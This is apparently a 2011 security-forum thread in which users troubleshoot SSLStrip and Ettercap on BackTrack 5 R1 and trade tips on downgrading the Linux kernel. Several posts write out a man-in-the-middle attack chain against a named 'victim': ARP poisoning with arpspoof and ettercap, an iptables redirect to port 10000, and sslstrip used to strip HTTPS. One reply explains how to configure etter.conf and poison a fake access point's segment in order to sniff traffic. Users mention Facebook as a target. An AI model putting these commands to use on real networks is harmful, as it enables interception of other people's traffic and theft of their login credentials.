SSLStrip & Ettercap not playing nicely together in BT5R1

[ericmilam]

ani body can tell me how to downgrade the kernel to 2.6.38 !! please !! need help U !!!

nano /etc/default/grub

Change the line GRUB_DEFAULT=0 to GRUB_DEFAULT=2

close it and run update-grub

After that reboot.

Now you should be booting into the older kernel. You can do a uname -a to make sure.

[MattMarquis]

Question - Will the above work even if you just dl'ed the R1 version? I didn't actually update 'into' R1.

[u5h4nt]

hy all, I think after a downgrade to 2.6.38 so the problem will be solved, but now I still have problems with my ettercap,
let's see the results when I run ettercap ...

Code:

# ettercap -T -q -i wlan0 -M arp:remote // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

 wlan0 ->       70:1A:04:9A:39:F4     192.168.88.89   255.255.255.255

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 0 hosts for scanning...
Scanning the whole netmask for 0 hosts...
0 hosts added to the hosts list...

FATAL: ARP poisoning needs a non empty hosts list.

no host detected .. but when i scan with nmap

Code:

#nmap -sP 192.168.88.1/24

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-28 20:35 CIT
Illegal character(s) in hostname -- replacing with '*'
Nmap scan report for hotspot*gateway (192.168.88.1)
Host is up (0.0072s latency).
MAC Address: 1C:BD:B9:85:E7:20 (D-link International PTE Limited)
Nmap scan report for 192.168.88.43
Host is up (0.045s latency).
Nmap scan report for 192.168.88.89
Host is up.
Nmap scan report for 192.168.88.96
Host is up (0.23s latency).
Nmap scan report for 192.168.88.99
Host is up (0.016s latency).
Nmap scan report for 192.168.88.115
Host is up (0.64s latency).
Nmap scan report for 192.168.88.164
Host is up (0.51s latency).
Nmap done: 256 IP addresses (7 hosts up) scanned in 58.70 seconds

please help me to solve this problem !!! n i'm really sorry for my bad english !!

[MattMarquis]

Answered my own question. Nope, it dosent work at all. In fact, it bricked my install. Simply boots into memtest now. No biggie, can reinstall BT4 as opposed to using the USB key i was using for it earlier until they get BT5 working with this. Just posting in case anyone else had the same question!

[destro23]

boots into memtest for me too.. but i saved my vmware session before i rebooted so i was able to go back...

I actually found a script called yama script that does a mitm and it actually doesn't crash anything!? maybe it's one of the options that is hosing it?

sslstrip -l 10000 partially works for me... but tanks when i go to facebook.

just odd

[hightech]

I too have the same L3 Error with BT5R1. This is how I do it.

Code:

 fragrouter -i wlan0 -B1 

arpspoof -i wlan0 -t (victim,gate)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip -a -k -f
 
ettercap -T -q -i wlan0

Is there an alternative for sniffing SSL connections besides ettercap?

When I goto change Grub to downgrade the kernel, it returns

Code:

root@root:~# update-grub
/usr/sbin/grub-probe: error: cannot find a device for / (is /dev mounted?).

I'm using live usb with persistence . If downgrading the kernel is the only fix, how may I accomplish this on my usb?

On another note - I always received an L3 Error with ettercap, so I started using fragrouter , arpspoof and sslstrip. That fixed it for me on BT4. Back in the same boat with BT5r1 .

This Release is awesome, hope this gets worked out soon.

[cseven]

Just back up a kernel for now. kernel 2.6.38 works fine.

[ericmilam]

So it looks like some people have posted, but here's my official answer.

If you Dl'd R1 then only 2.6.39-4 comes with it. You may be able to download 2.6.38 from the repos. And then you'd be good to go.

If you dist-upgrade, then my original post should work for you.

[ericmilam]

@u5h4nt I see a few problems

First, edit your etter.conf and change the uid & guid to 0, second, uncomment the redir fro IPtables (delete the # before the 2 lines of code)

Second, you don't poison wlan0, if you set up a fake AP, you need to poison on the tunnel interface, usually at0. You need to poison the segment, not your wireless interface. It's not finding any hosts, because no hosts are connected to your wlan0 interface.

[u5h4nt]

@ericmilam : I'm so sorry, I'm not really get what you mean !! i just newbie on BACKTRACK, LOL !!!
what you mean with this "You need to poison the segment, not your wireless interface" ???

can you tell me the steps when you wanna sniff in a network !!

by the way thanks for your responses !!!